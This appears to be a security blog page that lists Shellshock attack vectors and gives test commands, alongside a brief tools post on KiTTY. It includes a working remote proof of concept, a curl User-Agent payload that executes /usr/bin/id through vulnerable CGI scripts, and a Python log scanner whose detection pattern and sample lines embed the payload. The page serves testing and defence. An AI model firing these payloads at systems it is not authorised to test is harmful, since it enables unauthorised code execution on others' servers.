"It's done." - developer
"It's secure." - vendor
"It's deployed." - admin
...
"It's 0wn3d." - #hacker
Apr 1, 2015
Mar 11, 2015
Nov 6, 2014
Kitty to Replace Putty
Tags: tools
Just switched from Putty to Kitty recently, for a few reasons:
- Available in Portable format (like Putty).
- Built-in transparency.
- Quick start of duplicate session (ctrl+shift+click).
- kscp integration (drag and drop or ctrl+F3).
- hidden text editor (shift+F2).
Oct 13, 2014
ShellShock Attack Vectors
Tags: [Vuln], 0day, attack, shellshock
The Shellshock attack is popular, and wormable too. However, it requires an attack vector to work. Here are some of the common attack vectors for Shellshock:
- (Apache/etc) httpd - If the CGI script calls Bash, the script could execute arbitrary code as the httpd user. mod_php, mod_perl, and mod_python do not use environment variables and we believe they are not affected.
- (Secure Shell) ssh - It can be used to execute any command, via ssh, scp, git, rsync, etc.
- dhclient - The Dynamic Host Configuration Protocol Client (dhclient) is used to automatically obtain network configuration information via DHCP. This client uses various environment variables and runs Bash to configure the network interface. Connecting to a malicious DHCP server could allow an attacker to run arbitrary code on the client machine.
- CUPS - It is believed that CUPS is affected by this issue. Various user-supplied values are stored in environment variables when CUPS filters are executed.
- sudo - It could still be possible for the running command to set an environment variable that could cause a Bash child process to execute arbitrary code.
- Firefox - No detail about it as of now.
- Postfix - While the Postfix server does call Bash in a variety of ways, the Postfix server will replace various characters with a ?, and may allow an arbitrary environment variable to be set by the server. It is however possible that a filter could set environment variables.
Sep 27, 2014
ShellShock Testing
Tags: [Vuln], 0day, cmdline, pentest, shellshock
Patch your /usr/bin/bash NOW. The 'Shellshock' bug blasts OS X and Linux systems wide open. The attack vectors range from CGI scripts to DHCP clients (and maybe more), and lead to remote code execution.
Proof of Concept - at local system
A simple test to check if your Bash is vulnerable is available publicly.
$ env var='() { :;}; echo vulnerable' bash -c /bin/true
Upon running the above command, an affected version of bash will output "vulnerable". Once the patch has been applied, the same test will return the following result.
bash: warning: var: ignoring function definition attempt
bash: error importing function definition for 'var'
Proof of Concept - to a remote server.
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id"
A vulnerable web CGI will return uid=48(apache) gid=48(apache) groups=48(apache), followed by the HTML page. A non-vulnerable server should return just the HTML page.
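On the detection side, requests like the one above leave the "() {" marker in the web server's access log. The following is an added example, not code from the original post: it scans Apache combined-format log lines for that marker in the request line, Referer and User-Agent, checking both raw and percent-decoded values. The log lines, addresses and the /cgi-bin/status path are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache combined log format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" \d{3} \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# The test strings on this page all begin with "() {". Matching the marker
# anywhere, with flexible whitespace, is a deliberately broader signature.
FUNC_DEF_RE = re.compile(r'\(\)\s*\{')
FIELDS = ("request", "referer", "agent")

def scan(lines):
    """Return (host, time, [field names]) for each line carrying the marker."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not combined-format; skipped rather than guessed at
        # Check the raw and the percent-decoded value of every logged field.
        hits = [f for f in FIELDS
                if FUNC_DEF_RE.search(m.group(f))
                or FUNC_DEF_RE.search(unquote(m.group(f)))]
        if hits:
            findings.append((m.group("host"), m.group("time"), hits))
    return findings

# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [27/Sep/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [27/Sep/2014:10:00:05 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 87 "-" "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id"',
    '203.0.113.9 - - [27/Sep/2014:10:00:09 +0000] '
    '"GET /cgi-bin/status?x=%28%29%20%7B%20%3A%3B%7D HTTP/1.1" '
    '404 0 "() { :;}; echo probe" "curl/7.30.0"',
    '192.0.2.11 - - [27/Sep/2014:10:00:12 +0000] "GET /search?q=foo() HTTP/1.1" '
    '200 40 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, when, fields in scan(SAMPLE):
        print(f"{when} {host} marker in: {', '.join(fields)}")
```

A hit only shows that a request carried the marker; whether the host was affected still depends on the local Bash test above.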
